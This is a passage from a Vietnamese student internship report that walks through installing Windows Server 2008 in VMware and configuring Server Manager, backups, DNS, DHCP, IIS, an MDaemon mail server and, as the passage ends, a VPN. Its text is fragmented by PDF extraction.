bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều hành này qua các
bước cài đặt trên nền mạng.Thêm vào đó, các wizard Failover Clustering của
Windows Server 2008, và việc hỗ trợ đầy đủ cho Giao thức Internet phiên bản
6 (gọi tắt là IPv6) cộng với khả năng quản lý hợp nhất Network Load
Balancing khiến dễ dàng triển khai với tính sẵn có cao, thậm chí bởi những
người có hiểu biết chung nhất về CNTT.
Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho phép cài đặt
các vai trò máy chủ chỉ với những thành phần và hệ thống phụ cần thiết mà
không cần giao diện người dùng. Việc có ít hơn các vai trò và đặc tính đồng
nghĩa với việc giảm thiểu công việc cho ổ đĩa và dịch vụ, đồng thời giảm bớt
các bề mặt tấn công. Sản phẩm cũng cho phép nhân viên CNTT xây dựng đặc
tả tùy theo các vai trò máy chủ cần hỗ trợ.
Tích hợp Công nghệ Ảo hóa (Virtualization)
Windows Server Hyper-V, công nghệ ảo hóa thế hệ kế tiếp dành cho máy chủ
trên nền hypervisor, cho phép tận dụng tối đa các khoản đầu tư vào phần cứng
máy chủ bằng cách hợp nhất nhiều vai trò máy chủ thành các máy ảo riêng
biệt chạy trên một máy vật lý duy nhất. Cũng có thể chạy song song nhiều hệ
điều hành như Windows, Linux và các hệ điều hành khác một cách hiệu quả
trên một máy chủ duy nhất. Với Hyper – V và các chính sách cấp phép đơn
12
SVTT: Nguyễn Đình Duy
19. giản, giờ đây có thể tận dụng lợi thế của các khoản tiết kiệm chi phí và ảo hóa
một cách dễ dàng hơn bao giờ hết.
Hình 1.3 Mô hình ảo hóa
Nhờ các công nghệ truy cập ứng dụng tập trung của Windows Server 2008,
các ứng dụng cũng được ảo hóa một cách hiệu quả. Terminal Services
Gateway và Terminal Services RemoteApp cho phép dễ dàng truy cập từ xa
tới các chương trình chuẩn hoạt động trên nền Windows từ bất cứ vị trí nào
bằng cách chạy chương trình trên một máy chủ đầu cuối thay vì chạy trực tiếp
trên một máy trạm mà không cần tới một mạng riêng ảo (VPN) phức tạp.
Được xây dựng phục vụ Web
Windows Server 2008 xuất hiện với Internet Information Services 7.0 (IIS
7.0), một nền tảng máy chủ Web dễ sử dụng, tăng cường bảo mật để phát triển
và lưu trữ các ứng dụng và dịch vụ Web một cách tin cậy. Đặc tính nâng cao
quan trọng đối với nền tảng Web IIS 7.0 bao gồm một kiến trúc được thành
phần hóa để đem tới khả năng linh hoạt và kiểm soát cao hơn. II.7.0 cũng
cung cấp các khả năng quản lý được đơn giản hóa, khả năng khắc phục sự cố
mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả năng mở rộng
toàn diện.
Internet Information Server IIS 7.0 cùng với .NET Framework 3.0 cung cấp
một nền tảng toàn diện để xây dựng các ứng dụng kết nối người dùng và dữ
liệu, cho phép họ hình ảnh hóa, chia sẻ và thao tác thông tin. Thêm vào đó, IIS
7.0 còn đóng vai trò trung tâm trong việc hợp nhất các công nghệ nền tảng
Web của Microsoft – ASP.NET, các dịch vụ Web của Windows
Communication Foudation, và Windows Sharepoint Services.
13
SVTT: Nguyễn Đình Duy
20. Hình 1.4 Giao diện Internet Information Services (IIS) Manager
Bảo mật cao
Windows Server 2008 là hệ điều hành Windows Server bảo mật nhất từ trước
đến giờ. Hệ điều hành này đã được củng cố chắc chắn để giúp bảo vệ chống
lại hỏng hóc. Một số công nghệ mới giúp ngăn chặn các kết nối bất hợp pháp
tới các mạng, máy chủ, dữ liệu của bạn và các tài khoản người dùng. Chức
năng Network Access Protection (NAP) giúp đảm bảo rằng những máy tính
nào muốn kết nối với mạng của bạn đều phải tuân thủ chính sách bảo mật của
tổ chức. Việc tích hợp công nghệ và nhiều tính năng nâng cao khiến các dịch
vụ Active Directory trở thành một giải pháp IDA (Identity and Access - Nhận
dạng và Truy cập) tích hợp, hợp nhất và mạnh mẽ. Thêm vào đó, Read-Only
Domain Controller (RODC) và Mã hóa ổ đĩa bằng BitLocker cho phép bạn
triển khai cơ sở dữ liệu AD một cách bảo mật hơn trên khắp các khu vực của
văn phòng chi nhánh.
Tính toán hiệu năng cao
Lợi ích và các khoản tiết kiệm chi phí của Windows Server 2008 mở rộng tới
Windows HPC Server 2008 để phục vụ cho môi trường tính toán hiệu năng
cao (HPC) của bạn. Windows HPC Server 2008 được xây dựng trên nền
Windows Server 2008, công nghệ 64 bit và có thể mở rộng một cách hiệu quả
tới hàng nghìn lõi xử lý với tính năng có sẵn để cải thiện hiệu suất, và giảm
tính phức tạp của môi trường HPC. Windows HPC Server 2008 cho phép triển
khai rộng rãi hơn bằng cách đem tới cho người dùng cuối những trải nghiệm
phong phú và tích hợp, mở rộng từ ứng dụng máy bàn tới các cụm máy, và
14
SVTT: Nguyễn Đình Duy
21. bao gồm một bộ trọn vẹn các công cụ triển khai, quản trị và giám sát. Các
công cụ này dễ triển khai, quản lý và tích hợp với hạ tầng CNTT hiện có của
bạn.
2.3 Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức
2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare
Hình 2.1 VMware Workstation 10
VMWare WorkStation là một phần mềm giúp tạo máy ảo.
-
Chạy các ứng dụng trên nhiều hệ điều hành bao gồm cả Linux, Windows và
nhiều hơn nữa cùng một lúc trên cùng một máy tính mà không cần khởi động
lại.
-
Giúp đánh giá và kiểm tra hệ điều hành mới, các ứng dụng và các bản vá lỗi
trong một môi trường bị cô lập.
-
Củng cố nhiều máy tính chạy các máy chủ web, máy chủ cơ sở dữ liệu, vv vào
một máy tính duy nhất.
15
SVTT: Nguyễn Đình Duy
22. -
Xây dựng kiến trúc tham khảo để đánh giá trước khi triển khai vào sản xuất.
Như việc trong khi thực hành về máy Windows Server 2008 trên máy ảo để
nghiên cứu trước khi triển khai trên hệ thống thật.
2.3.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008
Xácđịnh yêu cầu phần cứng:
Hình 2.3.1.1.1 Cấu hình cài đặt Windows Server 2008.
Các bước cài đặt Windows Server 2008 (cài đặt trên môi trường
máyảoVMware Workstation)
Mở máyảoVMware
Workstation
16
SVTT: Nguyễn Đình Duy
23. Click File New
Vitual Machine…
Xuất
hiện
hộp
thoại New Vitual
Machine
Wizard
Click Next>.
17
SVTT: Nguyễn Đình Duy
24. Click Installer disc
image file (iso) nếu
có file ISO và click
Browse.. chọn
đường dẫn đến nơi
chưa file ISO.Nếu
cóđĩa Win Server
2008
thì
chon
Installer disc.
Nhập
Windows
Product key hoặcđể
trống
rồi
Click
Next>
18
SVTT: Nguyễn Đình Duy
25. Chọn Location nơi
Windows Server sẽ
càiđặt vào nơi nào
trong ổđĩa.
Click Next>
Nhập
dung
lượngổđĩa
vàoô
maximum disk size
khuyến nghị là 40
GB
Click Next>
19
SVTT: Nguyễn Đình Duy
26. Click Finish để tiến
hành càiđặt.
Chọn
ngôn
ngữ
càiđặt
và
click
Next.
20
SVTT: Nguyễn Đình Duy
27. Bấm
nút Install
now để bắt đầu cài
đặt.
Nhập product key
của
phiên
Windows
2008
Nếu
bản
Server
Enterprise
chưa
muốn
kích hoạt Windows
vì mục đích kiểm
tra hoặc dùng thử,
bạn bỏ dấu chọn ở
mục Automaticall
yactivate
Windows
then
I’m online và bấm
nút Next.
21
SVTT: Nguyễn Đình Duy
30. Chờ cho quá trình
càiđặt hoàn tất.
Trong
lần
đăng
nhập đầu tiên, hệ
thống yêu cầu bạn
thay đổi mật khẩu
ngay lập tức
24
SVTT: Nguyễn Đình Duy
31. Bạn
bấm OK,
nhập mật khẩu mới
và
bấm
phím Enter.
Và như vậy bạn đã
cài
đặt
Windows
hoàn
tất
Server
2008.
2.3.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008
Ngay khi bạn đăng nhập thành công, hệ thống hiển thị màn hình yêu cầu
thực hiện các thao tác cầu hình ban đầu cho Windows (Initial Configuration
Tasks). Trong đó bao gồm :
• Set time zone : thiết lập time zone cho server.
• Configure networking : thiết lập các thông số kết nối mạng bằng cách mở
cửa sổ Network Connections và tương tác với các kết nối hiện có trên server.
• Provide computer name and domain : mở hộp hội thoại System
Properties để thay đổi tên máy tính và kết nối vào domain.
• Enable automatic updating and feedback : kích hoạt tính năng này để cho
phép bạn cấu hình Windows automatic updating, Windows Error Reporting và
Customer Experience Improvement Program.
25
SVTT: Nguyễn Đình Duy
32. Hình 2.3.1.1.1Màn hình Initial Configuration Task
Hình 2.3.1.1.2 Kích hoạt tính năng automatic updating and feedback
26
SVTT: Nguyễn Đình Duy
33. Cài đặt Server Manager
Ngay khi bạn kết thúc các bước cấu hình và đóng màn hình Initial
Configuration Tasks, màn hìnhServer Manager tự động được kích hoạt. Tại
đây, bạn có thể thực hiện hầu hết các thao tác cấu hình trên server.
Hình 2.3.1.1.3Màn hình chính của Server Manager
Server Manager là một công cụ che phép bạn thực hiện hầu hết các thao tác
quản trị trên Windows Server 2008, từ các dịch vụ server như Active
Directory, DNS, DHCP, … đến các thành phần của hệ thống như .NET
Framework 3.0, Network Load Balancing, Group Policy Management, … ; từ
hệ thống firewall, quản lý user và group đến các dịch vụ sao lưu hệ thống,
quản lý đĩa…
Có thể nói rằng công cụ này là kết quả của sự kết hợp hòan hảo các công cụ
quản lý trên những phiên bản Windows trước đó.
27
SVTT: Nguyễn Đình Duy
34. Theo mặc định, Server Manager sẽ tự động khởi động ngay sau khi bạn
đăng nhập vào hệ thống. Nếu đã đóng cửa sổ này, bạn có thể thực hiện một
trong những cách sau để mở lại :
• Kích chuột phải vào biểu tượng Computer trên desktop, chọn Manage.
Các thành phần trong Server Manager
Khi làm việc với Server Manager, bạn sẽ tương tác với 5 thành phần chính :
• Roles cho phép bổ sung và loại bỏ các dịch vụ của server. Tại đây bạn
cũng có thể quản lý chi tiết dữ liệu tương ứng với mỗi dịch vụ.
• Features cho phép bổ sung và loại bỏ các thành phần trên Windows
Server 2008. Chức năng này tương tự như Add/Remove Windows
Components trong các phiên bản Windows trước đó.
• Diagnostics tích hợp các thành phần Event Viewer, Reliability and
Performance và Device Manager.
• Configuration bao gồm các công cụ Local Users And Group, Task
Scheduler, Windows Firewall with Advanced Security, WMI
Control và Services. WMI Control được dùng để quản lý các dịch vụ
Windows Management Instrumentation.
• Storage tích hợp hai công cụ Windows Server Backup và Disk
Management.
28
SVTT: Nguyễn Đình Duy
35. Hình 2.3.1.1.4 Quản lý chi tiết trên Active Directory Users and Computer.
Quản lý các dịch vụ Server (Roles)
Để mở các cửa sổ quản lý các dịch vụ server, bạn chọn mục Roles ở khung
bên trái của màn hình Server Manager. Trên Windows Server 2008 nói
chung, bạn có thể triển khai tất cả 16 dịch vụ server, từ Active Directory
Domain Services đến các server như DHCP, DNS, Web, …
Lưu ý : ngoài 16 dịch vụ server có mặt trên tất cả các phiên bản Windows
Server 2008, Microsoft còn cung cấp một dịch vụ server nữa, đó là Hyper-V.
Hyper-V là công nghệ ảo hóa chỉ chạy trên các nền tảng hệ điều hành 64-bit.
Để cài đặt một dịch vụ server bất kỳ, bạn đánh dấu chọn vào ô tương ứng
trên hộp thoại Select Server Roles. Tiếp theo, bấm nút Install để bắt đầu.
Trong tiến trình cài đặt, tùy theo đặc điểm riêng của từng dịch vụ server, bạn
sẽ điền thông tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.
29
SVTT: Nguyễn Đình Duy
36. Hình 2.3.1.1.5 Các dịch vụ Server trên Windows Server 2008
Quản lý các thành phần (Features)
Để mở cửa sổ quản lý các thành phần, bạn chọn mục Features ở khung bên
trái của màn hình Server Manager. Trên Windows Server 2008 bạn có thể
tương tác với tất cả 35 thành phần.
Để cài đặt một thành phần bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên
hộp thoại Select Features. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến
trình cài đặt, tùy theo đặc điểm riêng của từng thành phần, bạn sẽ điền thông
tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.
30
SVTT: Nguyễn Đình Duy
37. Hình 2.7 :Các thành phần Feature trên Windows Server 2008.
Sau khi cài đặt xong, thông tin và trạng thái của các thành phần sẽ hiển thị
trong khung Features Summary thuộc cửa sổ Server Manager. Tại đây, bạn
cũng có thể thực hiện các thao tác bổ sung và loại bỏ các thành phần này.
Quản lý không gian lưu trữ và sao lưu dữ liệu (Storage) và Backup Server.
Mặc định, Windows Server Backup chưa sẵn dùng trên Windows Server 2008.
Do đó, bạn cần bổ sung thành phần này vào hệ thống trước khi sử dụng. Các
bước thực hiện như sau :
Trong cửa sổ Server
Manager,
ở
khung Feature
Summary,
bạn
chọn Add Features.
31
SVTT: Nguyễn Đình Duy
38. Trong
màn
hình Select Features,
đánh
dấu
chọn
mục Windows
Server
Backup
Features và
bấm
nút Next.
Trong
màn
hình Confirm
Insatallation
Selection, bạn bấm
nút Install để bắt đầu
cài đặt.
Trong
màn
hình Installation
Results, bạn bấm
nút Close để
hoàn
thành thao tác bổ
sung thành phần cần
thiết vào Windows
Server 2008.
32
SVTT: Nguyễn Đình Duy
39. Kích chuột phải lênh
mục Windows
Server
Backup trong Storag
e,
chọn Backup
Schedule.
Trong
màn
hình Getting started,
bấm nút Next.
33
SVTT: Nguyễn Đình Duy
40. Trong
màn
hình Select backup
items, bạn chọn ổ đĩa
chứa hệ điều hành
của
mình,
trong
trường hợp này là ổ
đĩa C: và bấm
nút Next
Trong
màn
hình Specify backup
time, bạn chọn số lần
và thời điểm sao lưu.
Ở đây, chúng ta chọn
sao lưu vào lúc 10:00
tối mổi ngày (Once a
day). Sau khi chọn
xong,
bạn
bấm
nút Next.
Trong
màn
hình Select
destination disk, bạn
đánh dấu chọn vào ổ
đĩa mà mình sẽ sao
lưu đến và bấm
nút Next
34
SVTT: Nguyễn Đình Duy
41. Trong
hình Label
destination
bấm nút Next.
màn
disk,
Trong
màn
hình Summary, bạn
bấm
nút Finish để
hoàn thành thao tác
tạo lịch trình sao lưu
ổ đĩa
2.3.1.1.3 Cài đặt dịch vụ DNS
DNS (Domain Name System) Server là máy chủ được dùng để phân
giải domain thành địa chỉ IP và ngược lại. Ví dụ: athena.edu.vn là
173.214.177.90
Về cách thức hoạt động, DNS Server lưu trữ một cơ sở dữ liệu bao
gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy
client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong
cơ sở dữ liệu và gửi kết quả tương ứng về máy client.
35
SVTT: Nguyễn Đình Duy
42. Tại cửa sổ Server
Manager, chọn mục
Roles, chọn mục Add
Roles.
Chọn DNS và click Next.
36
SVTT: Nguyễn Đình Duy
44. Quá trình cài đặt hoàn
tất.
Để cấu hình DNS Server
vào
menu StartProgramsA
dministrative
Tools,
chọnDNS.
Forward
Lookup
Zones, chọn New Zone.
38
SVTT: Nguyễn Đình Duy
45. Trong
màn
hình
Welcome, bấm nút Next.
Trong màn hình Zone
Type, bạn chọn Primary
zone để cấu hình DNS
Server chính. Sau đó,
bấm nútNext.
39
SVTT: Nguyễn Đình Duy
46. Trong màn hình Zone
Name, bạn nhập tên zone
vào mục Zone name, ví
dụ thuvien-it.net. Sau đó,
bấm nút Next
Trong màn hình Zonle
File, bạn chấp nhận giá
trị mặc định và bấm
nút Next.
Để mặc định và click
Next
40
SVTT: Nguyễn Đình Duy
47. Trong
màn
hình
Completing, bạn xem lại
thông tin về DNS Server
và bấm nút Finish để
hoàn thành thao tác cấu
hình DNS.
Với các bước vừa thực
hiện ở trên, bạn đã cấu
hình
chức
năng forward, tiếp theo,
bạn sẽ cấu hình chức
năng reverse. Reverse
Lookup
Zones,
chọn New Zone
41
SVTT: Nguyễn Đình Duy
48. Trong
màn
hình
Welcome, bấm nút Next.
Trong màn hình Zone
Type,
bạn
chọn Primary.Sau đó,
bấm nút Next.
Trong màn hình Reverse
Lookup Zone Name, bạn
chọn thể loại địa chỉ IP
là Ipv4
42
SVTT: Nguyễn Đình Duy
49. Tiếp
theo,
bạn
điền network
IP của
mình và bấm nút Next.
Trong màn hình Zone
File, bạn chấp nhận giá
trị mặc định nhằm tạo ra
một file dùng để lưu các
bản ghi DNS cho zone
này, bấm nút Next.
43
SVTT: Nguyễn Đình Duy
50. Trong
màn
hình
Dynamic Update, bạn
chọn allow dynamic
updates và
bấm
nút Next
Trong
màn
hình
Completing, bạn bấm
nút Finish để hòan thành
thao tác cấu hình chức
năng reverse trên DNS
Server chính.
Cấu hình host đại diện
dùng để phân giải tên ra
số.
44
SVTT: Nguyễn Đình Duy
51. Mục name nhập www và
mục IP address nhập địa
chỉ Ip máy Server. Và
Click Add host.
Để kiểm tra và start
cmd
và
gõ
lệnh
nslookup.
Tạo Pointer đại diện tên
1 host có sẵn để phân
giải tên ra IP.
45
SVTT: Nguyễn Đình Duy
52. Trong hộp thoại New
Resource Record, bạn
nhập địa chỉ IP vào mục
Host IP address, đồng
thời nhập tên máy vào
mục Host name. Nếu
không nhớ, bạn bấm
nút Browse để tìm ra tên
máy cần thiết. Sau khi
điền xong, bấm nút OK.
Sau khi Click Browse…
Click OK.
2.3.1.1.4 Dịch Vụ DHCP
DHCP (Dynamic Host Configuration Protocol) Server là máy chủ được
dùng để cấp phát địa chỉ IP động cho các máy trạm trong một hệ thống
mạng. Trên các phiên bản trước như Windows 2000 Server hay
Windows Server 2003, bạn đã quen thuộc với chức năng này.
Về cách thức hoạt động, DHCP Server sử dụng dịch vụ cùng tên để
lắng nghe yêu cầu xin cấp phát địa chỉ IP được gởi từ máy trạm. Sau
46
SVTT: Nguyễn Đình Duy
53. khi nhận yêu cầu, DHCP Server sẽ chọn ra một địa chỉ IP trong dãy địa
chỉ của mình và gời về cho máy trạm. Đồng thời, DHCP Server cũng
gởi đến máy trạm các thông tin liên quan đến địa chỉ IP như subnet
mask, địa chỉ IP của các DNS Server, default gateway, …Đối với
Windows Server 2008, cách thức cài đặt và cấu hình được mô tả chi tiết
ngay sau đây.
Mở cửa sổ Server
Manager.
Trong
khung Roles
Summary ở
bên
phải,
bạn
bấm
nút Add Roles
47
SVTT: Nguyễn Đình Duy
54. Chọn dịch vụ DHCP
và click Next
Click Next
48
SVTT: Nguyễn Đình Duy
55. Chọn card mạng
lắng nghe yêu cầu
xin cấp DHCP và
click Next>
Nhập thông tin về
domain và các DNS
Server sau đó click
Next.
49
SVTT: Nguyễn Đình Duy
56. Trong màn hình
Specify Ipv4 WINS
Server Settings, bạn
chọn WINS is not
required
for
applications on this
network. Sau đó
click Next.
Trong màn hình Add
or
Edit
DHCP
Scopes,
bấm
nút Add. Và điền
các thông tin cần
thiết. và click OK.
50
SVTT: Nguyễn Đình Duy
57. Sau khi hoàn thành
việc định nghĩa các
dãy địa chỉ, bạn bấm
nút Next trong màn
hình Add or Edit
DHCP Scopes
Trong màn hình
Configure DHCPv6
Stateless Mode, bạn
chọn Disable
DHCPv6 stateless
mode
for
this
server.
51
SVTT: Nguyễn Đình Duy
58. Trong màn hình
Authorize
DHCP
Server, bạn chọn tài
khoản dùng để cấp
phép (authorizing)
cho DHCP Server
trong
Active
Directory Domain
Services. Sau đó,
bấm nút Next.
Trong màn hình
Confirm Installation
Selections, bạn xem
lại các thiết lập vừa
thực hiện và bấm
nútInstall để bắt đầu
cài đặt.
Như vậy chúng ta đã
hoàn tất quá trình
cài đặt và cấu hình
dịch vụ DHCP.
52
SVTT: Nguyễn Đình Duy
59. Đến đây, DHCP đã
sẵn sàng cung cấp
địa chỉ IP cho các
máy trạm trong hệ
thống mạng. Nếu
muốn hiệu chỉnh các
thông số cấu hình,
bạn thực hiện theo
các bước sau:vào
menu Start/Progra
ms/Administrative
Tools, chọn DHCP.
Mở rộng mục IPv4,
kích chuột phải vào
dòng Scope
[172.16.0.0],
chọn Properties
53
SVTT: Nguyễn Đình Duy
60. Trên tab General,
bạn có thể thay đổi
các giá trị Scope
name, Start
IP
address, End
IP
address, giới hạn
thời gian địa chỉ IP
tồn tại trên máy
trạm.
Để
thay
đổi
gateway, bạn kích
chuột
phải
lên
mục 003
Router trong Scope
Options,
chọnProperties.
54
SVTT: Nguyễn Đình Duy
61. Thay đổi giá trị
gateway bằng các
chức
năng Add và Remo
ve.
Để thay đổi địa chỉ
các DNS Server, bạn
kích chuột phải lên
mục 006
DNS
Servers trong Serve
r
Options,
chọn Properties.
55
SVTT: Nguyễn Đình Duy
62. Thay đổi địa chỉ của
DNS Server bằng
chức
năng Add và Remo
ve.
Để thay đổi tên
miền, bạn kích chuột
phải lên mục 015
DNS
Domain
Name trong Server
Options,
chọn Properties.
56
SVTT: Nguyễn Đình Duy
63. Nhập tên miền mới
vào
mục String
value.
Cấu hình địa chỉ IP
động trên máy trạm
bạn mở cửa sổ
Network
Connections và truy
cập vào hộp thoại
Internet
Protocol
(TCP/IP) Properties.
Tại
đây,
bạn
chọn Obtain an IP
address
automatically và
Obtain DNS server
address
automatically. Sau
đó, bấm nút OK
57
SVTT: Nguyễn Đình Duy
64. Trên máy trạm lệnh
xin cấp địa chỉ
DHCP bằng cách
vào Start Run
gõ cmd enter.
Gõ lệnh
/renew.
ipconfig
Để xin trả lại địa chỉ
IP mà DHCP đã cấp
gõ lệnh ipconfig /
release.
Như vậy chúng ta đã hoàn thành việc cấp địa chỉ IP động bằng dịch vụ
DHCP.
2.3.1.1.5 Cấu hình Web Server IIS.
58
SVTT: Nguyễn Đình Duy
65. Mở cửa sổ Server
Manager.
Trong
khung Roles
Summary ở bên
phải, bạn bấm Add
Roles.
Trong màn hình
Select
Server
Roles, chọn Web
Server (IIS)
59
SVTT: Nguyễn Đình Duy
66. Trong hộp thoại
Add
features
required for Web
Server (IIS), bạn
bấm
nút Add
Required
Featuresđể
bổ
sung các thành
phần liên quan đến
Web Server.
Trong màn hình
Select
Server
Roles,
bấm
nút Next.
60
SVTT: Nguyễn Đình Duy
67. Chọn lựa các thành
phần bổ sung vào
Web Server.
Trong màn
Confirm
Installation
Selections,
xem lại các
lập vừa thực
và
nútInstall để
đầu cài đặt.
hình
bạn
thiết
hiện
bấm
bắt
61
SVTT: Nguyễn Đình Duy
68. Sau khi cài đặt
hoàn tất. Khi IIS
Manager xuất hiện,
bạn sẽ bắt gặp
ngay trang web đầu
tiên (IIS Start
Page). Tại đây, bạn
sẽ tìm thấy thông
tin về các kết nối
đến
các
Web
Server mình đã
quản lý trong thời
gian gần với hiện
tại.
Trong màn hình
Specify
Server
Connection
Details, bạn nhập
địa chỉ IP của Web
Server cần quản lý
vào
mục Server
name và
bấm
nút Next.
62
SVTT: Nguyễn Đình Duy
69. Trong màn hình
Specify
a
Connection Name,
bạn nhập tên kết
nối
và
bấm
nút Finish.
Để thay đổi các
thông số cấu hình
trên Web Server,
bạn kích chọn tên
kết nối tương ứng
với Web Server ở
khung bên trái, sau
đó chọn mục cần
cầu hình ở khung
chính giữa.
63
SVTT: Nguyễn Đình Duy
70. Để kiểm tra Web
Server sau khi đã
cài đặt, bạn mở
trình duyệt và gõ
địa
chỉ http://localhos
t. Nếu màn hình
IIS 7 xuất hiện như
hình bên dưới, thao
tác cài đặt và cấu
hình Web Server
của bạn đã thành
công.
Xuất bản một
website Mở cửa sổ
Internet
Information
Service
(IIS)
Manager. Kích
chuột phải lên
mục Sites ở khung
bên trái, chọn Add
Web Site.
64
SVTT: Nguyễn Đình Duy
71. Trong hộp thoại
Add Web Site, bạn
điền thông tin :
Tên của website
vào mục Site name
Nhập đường dẫn
đến thư mục chứa
mã nguồn của
website
vào
mục Physical
path hoặc bấm vào
nút ba chấm (…)
để định đường dẫn.
Nếu xuất bản
website với mã
nguồn chứa ở một
máy tính khác, bạn
cần
bấm
vào
nút Connect as và
chỉ định tài khoản
dùng để truy cập
thư mục ở xa
này.Nếu xuất bản
nhiều website, bạn
cần nhập tên truy
cập chính xác của
các website vào
mục Host name.
65
SVTT: Nguyễn Đình Duy
72. Ngay sau đó,
một thông báo xuất
hiện, cho biết cổng
80 đã được một
website khác sử
dụng
(thông
thường là Default
Web Site) Trong
trường hợp này,
bạn
cần
kích
chọn Default Web
Site và
bấm
nút Stop ở khung
bên phải để ngưng
trạng thái hoạt
động của website
này. Đồng thời,
bạn chọn website
của mình và bấm
nút Start ở khung
bên phải để kích
hoạt trạng thái hoạt
động cho website
Đến nay, bạn đã
hoàn thành thao tác
xuất
bản
một
website. Nếu muốn
kiểm tra, bạn mở
trình duyệt và gõ
địa
chỉ
http://localhost.
Ngay sau đó, nội
dung website của
bạn sẽ xuất hiện.
2.3.1.1.6 Mail Server
66
SVTT: Nguyễn Đình Duy
73. Hiện nay có rất nhiều phần mềm quản lý Mail trên Server như: Mail
Exchange,… nhưng MDaemon Mail Server: là 1 trong những giải pháp
hệ thống mail server toàn diện nhất hiện nay dành cho các công ty,
doanh nghiệp với quy mô khác nhau. MDaemon Mail Server hiện có 3
phiên bản: Standard, Pro và Free. Sau đây là một số điểm đáng chú ý
của chương trình.
Hình 2.3.1.1.6.1 Giao diện Mdeamon.
Màn hình hiển thị chính của MDaemon (Graphical User Interface - GUI) đưa
ra thông tin quan trọng về các nguồn tài nguyên, các giao dịch, số liệu thống
kê, luồng dữ liệu đang trong trạng thái hoạt động (active) và các mail đang
trong quá trình chờ đợi (queued) để được xử lý. Bên cạnh đó, còn có sự lựa
chọn cho người dung chuyển đổi trạng thái activating/deactivating đối với các
hệ thống máy chủ khác nhau có sử dụng MDaemon. Cửa sổ bên phải hiển thị
đầy đủ thông tin về kết nối dữ liệu đầu vào và ra (incoming và outgoing) đang
được thực hiện.
67
SVTT: Nguyễn Đình Duy
74. Sau đây là quá trình cài đặt 1 Mail Server trên phần mềm Mdeamon.
Trước tiên, bạn
tải phiên bản
MDaemon Mail
Server mới nhất
và bắt đầu quá
trình
cài
đặt.Bấm "Next"
để tiếp tục.
Đánh dấu vào ô
"I have read and
I agree with all
the terms of this
license
agreement"
68
SVTT: Nguyễn Đình Duy
75. Chọn đường dẫn
lưu
trữ
của
chương
trình,
mặc định sẽ là ổ
C hệ thống (ổ đĩa
có cài hệ điều
hành Microsoft
Windows).
Lựa chọn phiên
bản cài đặt, nếu
bạn có key đăng
ký thì nhập vào ô
phía dưới. Ở ví
dụ sử dụng là
phiên bản free
hoặc miễn phí 30
ngày của phiên
bản Pro.
Tùy chọn các
thông tim phù
hợp với vị trí, ở
đây là VietNam
69
SVTT: Nguyễn Đình Duy
76. Điền đúng thông
tin về quy mô của
tổ chức hoặc
công ty.
Sau khi hoàn tất
các bước trên,
chọn "Next" để
bắt đầu cài đặt.
Chờ đợi cho quá
trình cài đặt hoàn
tất.
70
SVTT: Nguyễn Đình Duy
77. Điền tên Domain
chính xác ví
dụ:nguyendinhdu
y.tk
Điền địa chỉ DNS
chính (Primary)
và dự phòng
(Backup)
Giữ nguyên lựa
chọn "Setup
MDaemon as a
system service"
71
SVTT: Nguyễn Đình Duy
78. Bấm "Finish" để
kết thúc quá trình
cài đặt và cấu
hình ban đầu, bắt
đầu sử dụng
Giao diện sau khi
cài đặt thành
công.
72
SVTT: Nguyễn Đình Duy
79. Tạo 1 tài khoảng
mới vào Account
New
Account…
Nhập thông tin
vào
Email
address và Email
Password. Click
OK để tạo tài
khoảng Email.
73
SVTT: Nguyễn Đình Duy
80. Vào
Mail.
OutLook
Cấu hình Out
Look mail để
quán lý mail cho
tài
khoảng
test@nguyendinh
duy.tk. Nhập tên
hiện
thị
vào
Display name và
click Next>
74
SVTT: Nguyễn Đình Duy
81. Nhập địa chỉ
Email và Click
Next>
Nhập địa chỉ IP
vào 2 ô Incoming
và Outgoing và
click Next.
75
SVTT: Nguyễn Đình Duy
82. Nhập tên tài
khoảng và mật
khẩu. Click Next.
Click Finish để
hoàn tất cấu hình
quản lý mail cho
tài khoảng test.
76
SVTT: Nguyễn Đình Duy
83. Tạo mail để kiểm
ra việc gửi mail
từ tài khoảng test
đến 1 e mail bất
kỳ.
Vào mail được
gửi và kiểm tra
Mail.
Xem mail tu tài
khoảng
test@nguyendinh
duy.tk
77
SVTT: Nguyễn Đình Duy
84. Trả lời lại Mail
của tài khoảng
test@nguyendinh
duy.tk
Vào lại mail của
tài
khoảng
test@nguyendinh
duy.tk và đã nhận
được hồi âm.
Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.
2.3.1.1.7 Kết nối VPN
78
SVTT: Nguyễn Đình Duy
85. Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần
phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những
người dùng truy cập từ xa có thể được định danh và xác thực; các được
hầm có thể được tạo lập, duy trì và quản lý cho hàng trăm người dùng;
việc định tuyến có thể kiểm soát tất cả luồng lưu lượng qua Gateway,
và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn
cần được duy trì.
Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng
ảo hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các
kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần
liên quan. Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã
thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều
Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng
Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:
Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.
Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bước sau:
79
SVTT: Nguyễn Đình Duy
86. Đăng nhập
vào
máy
chủ ảo VPS
với quyền
quản trị.
Vào Start
Programs
Administrat
ive Tools
Routing
and remote
access để
cấu hình.
80
